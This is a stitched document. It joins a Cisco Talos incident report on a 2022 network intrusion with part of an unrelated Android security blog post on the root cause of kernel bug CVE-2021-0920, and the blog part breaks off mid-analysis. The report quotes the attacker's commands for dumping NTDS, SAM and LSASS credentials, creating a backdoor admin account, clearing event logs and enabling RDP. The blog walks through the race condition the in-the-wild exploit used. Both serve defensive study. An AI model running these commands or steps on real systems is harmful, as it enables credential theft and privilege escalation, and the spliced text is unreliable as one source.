Update (Aug. 10, 2022): Added clarifying details on activity involving Active Directory, and updated the Cisco Response and Recommendations section related to MFA.
Executive summary
On May 24, 2022, Cisco became aware of a potential compromise. Since that point, the Cisco Security Incident Response Team (CSIRT) and Cisco Talos have been working to remediate.
During the investigation, it was determined that a Cisco employee's credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim's browser were being synchronized.
The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations, attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to the VPN in the context of the targeted user.
CSIRT and Talos are responding to the event, and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development and code signing.
After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment.
The threat actor was successfully removed from the environment but displayed persistence, repeatedly attempting to regain access in the weeks following the attack; these attempts were unsuccessful.
We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, the Lapsus$ threat actor group, and the Yanluowang ransomware operators.
For further information, see the Cisco Response page here.
Initial vector
Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee's personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user's credentials, the attacker attempted to bypass multi-factor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the target's mobile device until the user accepts, either accidentally or simply in an attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers, who spoke in English with various international accents and dialects, purported to be associated with support organizations trusted by the user.
Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to log in to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.
Post-compromise TTPs
Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.
Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system and its hostname, and to identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating that manual operator interaction was occurring within the environment.
After establishing access to the VPN, the attacker began to use the compromised user account to log on to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers, and eventually obtained privileged access to domain controllers.
After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using "ntdsutil.exe", consistent with the following syntax:
powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q
They then worked to exfiltrate the dumped NTDS database over SMB (TCP/445) from the domain controller to the VPN system under their control.
After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.
Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called "z" on the system using the built-in Windows "net.exe" commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the "z" account by this actor in previous engagements prior to the Russian invasion of Ukraine.
C:\Windows\system32\net user z Lh199211* /add
C:\Windows\system32\net localgroup administrators z /add
This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database, on compromised Windows hosts:
reg save hklm\system system
reg save hklm\sam sam
reg save HKLM\security sec
On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS:
tasklist | findstr lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full
The attacker also took steps to remove evidence of activities performed on compromised systems. They used the "wevtutil.exe" utility to identify and clear event logs generated on the system:
wevtutil.exe el
wevtutil.exe cl [LOGNAME]
In many cases, we observed the attacker deleting the previously created local administrator account:
net user z /delete
To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems:
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn.
The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add Registry key values that enabled them to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM-level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later when their primary privileged access is revoked.
Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration during the attack comprised the contents of a Box folder associated with a compromised employee's account, along with employee authentication data from Active Directory. The Box data obtained by the adversary in this case was not sensitive.
In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single-character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker initially leveraged traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts compromised during the initial stages of the attack. While responding to the attack, we also observed the registration of several additional domains referencing the organization and took action on them before they could be used for malicious purposes.
After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated, as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.
Backdoor analysis
The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a "DELETE_SELF" command that removes the backdoor from the system completely. Another, more interesting, command, "WIPE", instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.
Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:
/bot/cmd.php?botid=%.8x
The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:
/bot/gate.php?botid=%.8x
Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.
The aforementioned HTTP requests are sent using the following user-agent string:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33
The malware also creates a file called "bdata.ini" in the malware's current working directory that contains a value derived from the volume serial number of the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:
C:\users\public\win\cmd.exe
The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.
Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.
Attack attribution
Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors, who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations.
UNC2447 is a financially motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as "double extortion," in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.
Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of Lapsus$, a threat actor group reported to have been responsible for several notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.
While we did not observe ransomware deployment in this attack, the TTPs used were consistent with "pre-ransomware activity," activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with those previous engagements, in which we likewise did not observe deployment of ransomware in the victim environments.
Cisco response and recommendations
Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker's progression. We created two ClamAV signatures, which are listed below.
Win.Exploit.Kolobko-9950675-0
Win.Backdoor.Kolobko-9950676-0
Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information.
Given the actor's demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their phones. It is also essential to educate employees about who to contact if such incidents do arise, to help determine whether the event was a technical issue or malicious.
For Duo, it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from an unrealistic location, or attack patterns like login brute forcing, can help detect unauthorized access.
Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that connecting devices match the security requirements present in the environment and can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.
Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access to the environment.
Centralized log collection can help minimize the lack of visibility that results when an attacker takes active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication that an attack is underway.
In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization's ability to recover following an attack. Ensuring that backups are kept offline and periodically tested can help mitigate this risk and ensure an organization's ability to effectively recover following an attack.
Auditing of command-line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement.
MITRE ATT&CK mapping
All of the previously described TTPs observed in this attack are listed below based on the phase of the attack in which they occurred.
Guest Post by Xingyu Jin, Android Security Research
This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.
Overview of in-the-wild CVE-2021-0920 exploits
A surveillance vendor named Wintego developed an exploit for a Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 (based on the earliest captured sample) until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin and applied to Samsung devices in Samsung's December 2021 security update.
Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.
This issue was initially discovered in 2016 by a Red Hat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.
Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) on a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read/write primitives, and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.
Text extracted from captured samples dubbed the vulnerability "quantum Linux kernel garbage collection," which appears to be a fitting title for this blog post.
Introduction
CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference counting of file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, the sk_buff object. In the following sections, we'll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.
What is SCM_RIGHTS?
Linux developers can share file descriptors (fds) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the sending process can immediately close the file descriptor on its end, even if the receiving process has not yet accepted and taken ownership of it. When file descriptors are in this "queued" state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. This LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing with this blog post.
Sending
As stated previously, a unix-domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we'll start from the sender's point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.
struct scm_fp_list {
        short                   count;
        short                   max;
        struct user_struct      *user;
        struct file             *fp[SCM_MAX_FD];
};
unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.
To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from userspace and initializes scm_cookie->fp, which can contain up to SCM_MAX_FD file structures.
Since the Linux kernel uses the sk_buff (also known as socket buffer or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):
…
/*
 * Need to duplicate file references for the sake of garbage
 * collection.  Otherwise a socket in the fps might become a
 * candidate for GC while the skb is not yet queued.
 */
UNIXCB(skb).fp = scm_fp_dup(scm->fp);
if (!UNIXCB(skb).fp)
        return -ENOMEM;
…
The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that's being passed, so the file is still valid even after the sender closes the transmitted file descriptor later:
Let's examine a concrete example. Assume we have sockets A and B, and A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to B's sk_receive_queue, which stores received datagrams:
sk_buff carries the scm_fp_list structure
The reference count of A is incremented to 2 and the reference count of B is still 1.
Receiving
Now, let's take a look at the receiver side in unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First, the kernel grabs the current skb from sk_receive_queue using skb_peek. Second, since scm_fp_list is attached to the skb, the kernel calls unix_detach_fds (link) to parse the transmitted file structures from the skb and clear the skb from sk_receive_queue:
/* Mark read part of skb as used */
if (!(flags & MSG_PEEK)) {
        UNIXCB(skb).consumed += chunk;
        sk_peek_offset_bwd(sk, chunk);
        if (UNIXCB(skb).fp)
                unix_detach_fds(&scm, skb);
        if (unix_skb_len(skb))
                break;
        skb_unlink(skb, &sk->sk_receive_queue);
        consume_skb(skb);
        if (scm.fp)
                break;
The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:
/* All of the files that fit in the message have had their
 * usage counts incremented, so we just free the list.
 */
__scm_destroy(scm);
Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:
As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the "middle" of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed it.
Let's consider the following scenario:
The process creates sockets A and B.
A sends socket A to socket B.
B sends socket B to socket A.
Close A.
Close B.
Scenario for reference count cycle
Both sockets are closed prior to accepting the passed file descriptors. The reference counts of A and B are both 1 and can't be further decremented because the sockets were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures, and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count is also incremented.
When a file descriptor is sent in an SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list, gc_inflight_list. The kernel increments unix_tot_inflight, which counts the total number of inflight sockets. Then, the kernel increments u->inflight, which tracks the inflight count for each individual file descriptor, in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:
Thus, here is what the sk_buff looks like when transferring a file descriptor between sockets A and B:
The inflight count of A is incremented
When the socket file descriptor is received on the other side, the unix_sock.inflight count will be decremented.
Let's revisit the reference count cycle scenario before the close syscalls. This cycle is breakable, because any socket file can still receive the transmitted file and break the reference cycle:
Breakable cycle before closing A and B
After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:
Unbreakable cycle after closing A and B
Now, let's check another example. Assume we have sockets A, B and 𝛼:
A sends socket A to socket B.
B sends socket B to socket A.
B sends socket B to socket 𝛼.
𝛼 sends socket 𝛼 to socket B.
Close A.
Close B.
Breakable cycle for A, B and 𝛼
The cycle is breakable, because we can get the newly installed file descriptor B′ from the socket file descriptor 𝛼, and the newly installed file descriptor A′ from B′.
Garbage Collection
A high-level view of garbage collection is available from lwn.net:
"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.
At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."
To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle unbreakable reference cycles. To identify which file descriptors are part of unbreakable cycles:
Add any unix_sock objects whose reference count equals their inflight count to the gc_candidates list.
Determine whether each socket is referenced by any sockets outside of the gc_candidates list. If it is, then it is reachable: remove it, and any sockets it references, from the gc_candidates list. Repeat until no more reachable sockets are found.
After this iterative process, only sockets that are solely referenced by other sockets within the gc_candidates list are left.
Let's take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference count equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):
Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#L138) along with the function pointer dec_inflight to iterate through each candidate's sk_receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):
/* Now remove all internal in-flight reference to children of
 * the candidates.
 */
After iterating through all the candidates, if a gc candidate still has a positive inflight count, it means that it is referenced by objects outside of the gc_candidates list and is therefore reachable. These candidates should not be included in the gc_candidates list, so the related inflight counts need to be restored.
To do this, the kernel puts the candidate on the not_cycle_list instead, iterates through the receive queue of each transmitted file in the gc_candidates list (garbage.c#L281), and increments the inflight counts back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:
/* Restore the references for children of all candidates,
 * which have remaining references.  Do this recursively, so
 * only those remain, which form cyclic references.
 *
 * Use a "cursor" link, to make the list traversal safe, even
 * though elements might be moved about.
 */
list_add(&cursor, &gc_candidates);
while (cursor.next != &gc_candidates) {
        u = list_entry(cursor.next, struct unix_sock, link);
        /* Move cursor to after the current position. */
Now gc_candidates contains only "garbage". The kernel restores the original inflight counts for gc_candidates, moves the candidates from not_cycle_list back to gc_inflight_list, and invokes __skb_queue_purge to clean up the garbage (garbage.c#L306).
	/* Now gc_candidates contains only garbage.  Restore original
	 * inflight counters for these as well, and remove the skbuffs
	 * which are creating the cycle(s).
	 */
There are two ways to trigger the garbage collection process:
wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets.
When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.
Note that unix_gc is not preemptive. If garbage collection is already in progress, the kernel will not perform another unix_gc invocation.
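The second trigger can be exercised from user space. A minimal sketch (assuming Linux and Python 3.9+, where socket.send_fds wraps sendmsg with SCM_RIGHTS):

```python
import socket

# Pass a socket over itself so it becomes "inflight", then close both
# descriptors; releasing the last file reference is the point at which
# the kernel invokes unix_gc.
f00, f01 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
sent = socket.send_fds(f00, [b"x"], [f00.fileno()])  # f00 -> [f00] -> f01
f00.close()
f01.close()  # closing the last descriptor triggers garbage collection
```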
Now, let's check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝐼:
Socket f00 sends socket f00 to socket f01.
Socket f01 sends socket f01 to socket 𝐼.
Close f00.
Close f01.
Before the garbage collection process starts, the status of the socket file descriptors is:
f00: ref = 1, inflight = 1
f01: ref = 1, inflight = 1
𝐼: ref = 1, inflight = 0
Breakable cycle by f00, f01 and 𝐼
During the garbage collection process, f00 and f01 are considered garbage candidates. The inflight count of f00 is dropped to zero, but the count of f01 is still 1 because 𝐼 is not a candidate. Thus, the kernel will restore the inflight count from f01's receive queue. As a result, f00 and f01 are not treated as garbage anymore.
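The candidate scan and the recursive restore pass can be modeled outside the kernel. The following is a simplified Python model of the algorithm described above (illustrative only, not kernel code; names are invented for the sketch):

```python
def collect_garbage(refs, inflight, queues):
    """Model of unix_gc: return the set of sockets that would be purged.

    refs/inflight map a socket name to its counts; queues maps a
    receiving socket to the list of sockets sitting in its receive queue.
    """
    # Stage 0: candidates are sockets whose every reference is inflight.
    candidates = {s for s in refs if inflight[s] == refs[s] and inflight[s] > 0}
    counts = dict(inflight)
    for s in candidates:
        for child in queues.get(s, ()):
            if child in candidates:
                counts[child] -= 1
    # Stage 1: anything still positive is externally reachable; restore
    # the counts of its children recursively (the kernel's not_cycle_list).
    not_cycle = [s for s in candidates if counts[s] > 0]
    reachable = set(not_cycle)
    while not_cycle:
        s = not_cycle.pop()
        for child in queues.get(s, ()):
            if child in candidates:
                counts[child] += 1
                if child not in reachable:
                    reachable.add(child)
                    not_cycle.append(child)
    # Stage 2: what remains forms unreachable cycles -- garbage.
    return candidates - reachable

# The breakable cycle above: f00 sits in f01's queue, f01 in I's queue.
refs = {"f00": 1, "f01": 1, "I": 1}
inflight = {"f00": 1, "f01": 1, "I": 0}
queues = {"f01": ["f00"], "I": ["f01"]}
assert collect_garbage(refs, inflight, queues) == set()  # nothing purged
```

With an unbreakable cycle (f00 and f01 sent only to each other, both closed), the same model returns both sockets as garbage.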
CVE-2021-0920 Root Cause Analysis
When a user receives an SCM_RIGHTS message via recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is set, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.
recvmsg without MSG_PEEK flag
The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight counts when the MSG_PEEK flag is NOT set: it calls unix_detach_fds to decrement the inflight count, and unix_detach_fds then clears the list of passed file descriptors (scm_fp_list) from the skb:
Later, skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#L2451) to destroy the current skb. Following the call chain kfree(skb) -> __kfree_skb, the kernel invokes the function pointer skb->destructor (code), which redirects to unix_destruct_scm:
	if (UNIXCB(skb).fp)
		unix_detach_fds(&scm, skb);

	/* So fscking what? fput() had been SMP-safe since the last Summer */
	scm_destroy(&scm);
	sock_wfree(skb);
}
In fact, unix_detach_fds will not be invoked again here from unix_destruct_scm, because UNIXCB(skb).fp was already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i])) is invoked from scm_detach_fds to install a new file descriptor.
recvmsg with MSG_PEEK flag
The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to "peek" at the message while the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds, which increases the reference count of the inflight file (af_unix.c#L2149):
	if (flags & MSG_PEEK) {
		/* It is questionable, see note in unix_dgram_recvmsg.
		 */
		if (UNIXCB(skb).fp)
			scm.fp = scm_fp_dup(UNIXCB(skb).fp);

		sk_peek_offset_fwd(sk, chunk);

		if (UNIXCB(skb).fp)
			break;
	}
Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver still gets a new file descriptor for the inflight socket.
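This asymmetry can be observed from user space (a sketch assuming Linux and Python 3.9+): a peeked SCM_RIGHTS message still installs a new descriptor, and the same message is delivered again on the real read.

```python
import os
import socket

a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
r, w = os.pipe()

socket.send_fds(a, [b"m"], [r])  # r becomes an inflight descriptor

# Peek: the skb stays queued, yet a freshly installed fd is returned.
msg1, fds1, _, _ = socket.recv_fds(b, 1, 1, socket.MSG_PEEK)

# Real read: the same message is delivered again; this path detaches
# the fd list (unix_detach_fds) and consumes the skb.
msg2, fds2, _, _ = socket.recv_fds(b, 1, 1)

for fd in fds1 + fds2:
    os.close(fd)
for s in (a, b):
    s.close()
os.close(r)
os.close(w)
```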
recvmsg Examples
Let's see a concrete example. Assume there are the following socket pairs:
f00, f01
f10, f11
Now, the program does the following operations:
f00 → [f00] → f01 (meaning f00 sends [f00] to f01)
f10 → [f00] → f11
Close(f00)
Breakable cycle by f00, f01, f10 and f11
Here is the status:
inflight(f00) = 2, ref(f00) = 2
inflight(f01) = 0, ref(f01) = 1
inflight(f10) = 0, ref(f10) = 1
inflight(f11) = 0, ref(f11) = 1
If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f00 as the garbage candidate. However, f00 will not have its inflight count altered and the kernel will not purge any garbage.
If f01 then calls recvmsg with the MSG_PEEK flag, the receive queue doesn't change and the inflight counts are not decremented. f01 gets a new file descriptor f00', which increments the reference count on f00:
MSG_PEEK increments the reference count of f00 while the receive queue is not cleared
Status:
inflight(f00) = 2, ref(f00) = 3
inflight(f01) = 0, ref(f01) = 1
inflight(f10) = 0, ref(f10) = 1
inflight(f11) = 0, ref(f11) = 1
Then, f01 calls recvmsg without the MSG_PEEK flag, and f01's receive queue is removed. f01 also fetches a new file descriptor f00'':
The receive queue of f01 is cleared and f00'' is obtained from f01
Status:
inflight(f00) = 1, ref(f00) = 3
inflight(f01) = 0, ref(f01) = 1
inflight(f10) = 0, ref(f10) = 1
inflight(f11) = 0, ref(f11) = 1
UAF Scenario
From a very high-level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition in which the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object.
Let's see how the captured 0-day sample triggers the bug step by step (a simplified version; in reality more threads may need to work together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and a single socket 𝐼:
f00, f01
f10, f11
f20, f21
f30, f31
socket 𝐼 (in practice there might be thousands of 𝐼 sockets, used to prolong the garbage collection process in order to evade a BUG_ON check which will be introduced later)
Now, the program performs the following operations:
Close the following file descriptors prior to any recvmsg calls:
Close(f00)
Close(f01)
Close(f11)
Close(f10)
Close(f30)
Close(f31)
Close(𝐼)
Here is the status:
inflight(f00) = N + 1, ref(f00) = N + 1
inflight(f01) = 2, ref(f01) = 2
inflight(f10) = 3, ref(f10) = 3
inflight(f11) = 1, ref(f11) = 1
inflight(f20) = 0, ref(f20) = 1
inflight(f21) = 0, ref(f21) = 1
inflight(f31) = 1, ref(f31) = 1
inflight(𝐼) = 1, ref(𝐼) = 1
If the garbage collection process happens now, the kernel performs the following steps:
List f00, f01, f10, f11, f31 and 𝐼 as garbage candidates. Decrease the inflight count for the candidate children in each receive queue.
Since f21 is not considered a candidate, f11's inflight count is still above zero.
Recursively restore the inflight counts.
Nothing is considered garbage.
A potential skb UAF by race condition can be triggered by:
Call recvmsg with the MSG_PEEK flag from f21 to get f11'.
Call recvmsg with the MSG_PEEK flag from f11 to get f10'.
Concurrently perform the following operations:
Call recvmsg without the MSG_PEEK flag from f11 to get f10''.
Call recvmsg with the MSG_PEEK flag from f10'.
How is this possible? Let's see a case where the race condition is not hit, so there is no UAF:
Thread 0
Thread 1
Thread 2
Call unix_gc
Stage 0: List f00, f01, f10, f11, f31, 𝐼 as garbage candidates.
Call recvmsg with the MSG_PEEK flag from f21 to get f11'
Stage 0: decrease the inflight count of every garbage candidate's children
Status after stage 0:
inflight(f00) = 0
inflight(f01) = 0
inflight(f10) = 0
inflight(f11) = 1
inflight(f31) = 0
inflight(𝐼) = 0
Stage 1: Start restoring inflight counts.
Call recvmsg with the MSG_PEEK flag from f11 to get f10'
Call recvmsg without the MSG_PEEK flag from f11 to get f10''
unix_detach_fds: UNIXCB(skb).fp = NULL
Blocked by spin_lock(&unix_gc_lock)
Stage 1: scan_inflight cannot find candidate children from f11. Thus, the inflight count accidentally remains the same.
